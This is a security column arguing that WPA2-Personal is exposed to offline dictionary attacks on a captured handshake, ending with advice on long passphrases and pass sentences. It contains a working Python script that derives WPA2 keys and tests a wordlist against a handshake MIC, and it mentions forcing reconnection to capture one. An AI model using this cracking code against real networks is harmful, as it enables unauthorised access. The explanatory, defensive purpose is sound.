What no one is saying about WPA2 security

Many articles have been written in the last few days about the latest flaw discovered in the TKIP encryption used by WPA for wireless networks. In a nutshell, they all boil down to: WPA bad, WPA2 good.

Never mind that most of those articles contain technical mistakes; I plan to write about that next time. The glaring problem with the coverage of the latest WPA TKIP flaw is what the technical press is not saying.

WPA2 is not, in and of itself, good security.

WPA2 is immune to the latest attack, and to the one disclosed back in November of last year, but both of those are online attacks against TKIP: the attacker has to interact with a live network while it runs. WPA2, just like WPA, has a glaring hole when it comes to offline attacks on the pre-shared key used by the "Personal" mode found in nearly every home and small-office router.

The handshake that a computer and the router exchange when the computer joins the network can be captured out of the air (or forced by briefly kicking a computer off the network so that it reconnects), and then brute-forced offline. The handshake contains a message integrity check computed from a key that is itself derived from the password and the network name (SSID), so each guess can be verified without ever touching the network again. That is, someone can try to guess the password for weeks on end, with no lockouts and no log entries, and you would have no clue that this was happening. To be really secure, the network needs a long, reasonably random password.
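To make the offline attack concrete, here is an added example (not code from the original column) that derives the WPA/WPA2-Personal keys the way the standard does and runs a wordlist against a captured 4-way handshake. The SSID, MAC addresses, nonces and the handshake frame are constructed inline so the script runs offline; a real attack would read them from a packet capture. The pairwise master key is PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt (4096 iterations, 32 bytes), the key confirmation key is the first 16 bytes of the PTK, and the MIC on message 2 is HMAC-SHA1 truncated to 16 bytes, as for a CCMP (WPA2) network.

```python
import hashlib
import hmac

# Constructed values standing in for what a listener sees in the clear.
SSID = b"HomeNet"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))        # nonce the router sends in message 1
SNONCE = bytes(range(32, 64))    # nonce the computer sends in message 2

# Message 2 of the handshake as an EAPOL-Key frame with the MIC field zeroed.
# Field layout (offsets): EAPOL header 0..4, descriptor type 4, key info 5..7,
# key length 7..9, replay counter 9..17, nonce 17..49, IV 49..65, RSC 65..73,
# key ID 73..81, MIC 81..97, key data length 97..99.
MIC_OFFSET = 81
EAPOL_M2_TEMPLATE = (
    b"\x01\x03\x00\x5f"      # EAPOL version 1, type 3 (Key), body length 95
    + b"\x02"                # descriptor type 2: RSN (802.11i)
    + b"\x01\x0a"            # key info: version 2 (HMAC-SHA1), pairwise, MIC bit set
    + b"\x00\x10"            # key length 16
    + b"\x00" * 7 + b"\x01"  # replay counter 1
    + SNONCE
    + b"\x00" * 16           # key IV
    + b"\x00" * 8            # key RSC
    + b"\x00" * 8            # key ID (reserved)
    + b"\x00" * 16           # key MIC, zero while computing
    + b"\x00\x00"            # key data length 0
)


def derive_pmk(passphrase: str, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF: concatenated HMAC-SHA1(key, label || 0x00 || data || counter)."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_kck(pmk: bytes, ap: bytes, sta: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """KCK is the first 128 bits of the PTK expanded from the PMK, MACs and nonces."""
    data = min(ap, sta) + max(ap, sta) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf(pmk, b"Pairwise key expansion", data, 48)  # 384-bit PTK for CCMP
    return ptk[:16]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed (key info version 2)."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_handshake(passphrase: str) -> bytes:
    """Simulate the capture: message 2 with the genuine MIC filled in."""
    kck = derive_kck(derive_pmk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    mic = eapol_mic(kck, EAPOL_M2_TEMPLATE)
    return EAPOL_M2_TEMPLATE[:MIC_OFFSET] + mic + EAPOL_M2_TEMPLATE[MIC_OFFSET + 16:]


def offline_attack(captured_frame: bytes, wordlist):
    """Return the first candidate whose derived KCK reproduces the captured MIC, else None."""
    captured_mic = captured_frame[MIC_OFFSET:MIC_OFFSET + 16]
    for guess in wordlist:
        if not 8 <= len(guess) <= 63:   # not a legal passphrase, skip without hashing
            continue
        kck = derive_kck(derive_pmk(guess, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
        if hmac.compare_digest(eapol_mic(kck, captured_frame), captured_mic):
            return guess
    return None


if __name__ == "__main__":
    captured = build_handshake("summertime")   # the network's real passphrase
    print(offline_attack(captured, ["password", "IlRIits", "letmein", "summertime"]))
```

Every guess costs 4096 SHA-1 iterations, which is what slows the attacker down, but nothing in the loop ever talks to the router, so the only defence is a passphrase that is not in any wordlist. Note that "IlRIits" is skipped before hashing: at seven characters it cannot be a WPA passphrase at all.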

The password for both WPA and WPA2 Personal can range from 8 to 63 characters. Longer is better, and dictionary words should be avoided; the offline attack is, after all, a dictionary attack.

How long is a matter of opinion. Many suggest a password of at least 20 characters. Back in 2005, George Ou argued that a random password of 8 or 9 characters was "reasonably safe". Guessing hardware has only gotten faster since then, so the longer recommendation is the safer bet.

The problem with random passwords, of course, is remembering them. But the good news with WPA and WPA2 passwords is that you shouldn't need to remember them. For one thing, the password typically only needs to be entered once per computer that uses a given wireless network. And since you are, by definition, within range of the router, a piece of paper with the password on it, taped to the router, should be sufficient.

If you want a memorable password, try starting with a sentence. For example, take

I love Rhode Island in the summer

The first letter of each word gives "IlRIits", which is not in any dictionary and mixes upper and lower case letters. On its own it is only seven characters, one short of the minimum, so put a sequence of numbers or special characters on one end of it. Keep in mind that a single digit or symbol tacked onto the end is a pattern that cracking tools try by default, so add several, and you get a reasonably random password that should still be memorable.

Or, do what I do and use a pass sentence rather than a password. The sample sentence above isn't all that much to type, and at 32 characters it is well past the 20-character suggestion, but I'd add at least one special character to it for good luck.
